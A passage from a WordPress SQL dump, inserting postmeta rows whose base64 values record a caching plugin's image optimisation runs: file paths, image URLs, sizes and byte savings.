cL3NodXR0ZXJzdG9ja18xODQxNDk0OS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDYxLCJ0aW1lIjoxNDgzNTgwNTE5LCJpZCI6ODcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDkzLCJ0aW1lIjoxNDgzNTgwNTIyLCJpZCI6ODcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTEyMiwidGltZSI6MTQ4MzU4MDUyNiwiaWQiOjg3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDg1LCJ0aW1lIjoxNDgzNTgwNTMwLCJpZCI6ODcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo1NTgsInRpbWUiOjE0ODM1ODA1MzMsImlkIjo4NzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjgyMCwidGltZSI6MTQ4MzU4MDUzNywiaWQiOjg3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTI3LCJ0aW1lIjoxNDgzNTgwNTQwLCJpZCI6ODcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxMjAwLCJ0aW1lIjoxNDgzNTgwNTQ0LCJpZCI6ODcxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29924, 867, 'wpfc_optimisation_reduction', '980'); 
INSERT INTO `wp_postmeta` VALUES (29925, 867, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi5qcGciLCJ3aWR0aCI6NTc1LCJoZWlnaHQiOjEwMywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLmpwZyIsInJlZHVjdGlvbiI6ODU3LCJ0aW1lIjoxNDgzNTgwNTUxLCJpZCI6Ijg2NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTItMzQweDEwMy5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjEwMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi0zNDB4MTAzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLTM0MHgxMDMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwNTUzLCJpZCI6ODY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLTI1MHgxMDMuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxMDMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTItMjUweDEwMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi0yNTB4MTAzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MDU1NSwiaWQiOjg2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi0yMDB4MTAzLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MTAzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLTIwMHgxMDMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTItMjAweDEwMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODA1NTcsImlkIjo4Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTItMjI1eDEwMy5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjEwMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi0yMjV4MTAzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLTIyNXgxMDMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwNTU5LCJpZCI6ODY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLTUxMHgxMDMuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0IjoxMDMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTItNTEweDEwMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi01MTB4MTAzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MDU2MSwiaWQiOjg2N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLTExNHgxMDMuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTItMTE0eDEwMy5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEwMyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi0xMTR4MTAzLmpwZyIsInJlZHVjdGlvbiI6MTE0LCJ0aW1lIjoxNDgzNTgwNTY0LCJpZCI6ODY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTItMTgweDEwMy5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi0xODB4MTAzLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTAzIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLTE4MHgxMDMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwNTY2LCJpZCI6ODY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTItMjQ3eDEwMy5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi0yNDd4MTAzLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMTAzIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLTI0N3gxMDMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwNTY4LCJpZCI6ODY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTItMzAweDEwMy5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi0zMDB4MTAzLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMTAzIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLTMwMHgxMDMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwNTcwLCJpZCI6ODY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6b19iYW5uZXItZTE0NzIyMjA0ODI2OTItNDAweDEwMy5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvX2Jhbm5lci1lMTQ3MjIyMDQ4MjY5Mi00MDB4MTAzLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiMTAzIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem9fYmFubmVyLWUxNDcyMjIwNDgyNjkyLTQwMHgxMDMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwNTcyLCJpZCI6ODY3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29926, 863, 'wpfc_optimisation_reduction', '10983'); 
INSERT INTO `wp_postmeta` VALUES (29927, 863, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLmpwZyIsIndpZHRoIjo0MzY4LCJoZWlnaHQiOjI5MTIsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODA1NzcsImlkIjoiODYzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjYxMiwidGltZSI6MTQ4MzU4MDU4MCwiaWQiOjg2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjExMjUsInRpbWUiOjE0ODM1ODA1ODUsImlkIjo4NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxMDgzLCJ0aW1lIjoxNDgzNTgwNTg5LCJpZCI6ODYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoyMzcxLCJ0aW1lIjoxNDgzNTgwNTk0LCJpZCI6ODYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTY3LCJ0aW1lIjoxNDgzNTgwNTk4LCJpZCI6ODYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDcyLCJ0aW1lIjoxNDgzNTgwNjAxLCJpZCI6ODYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0a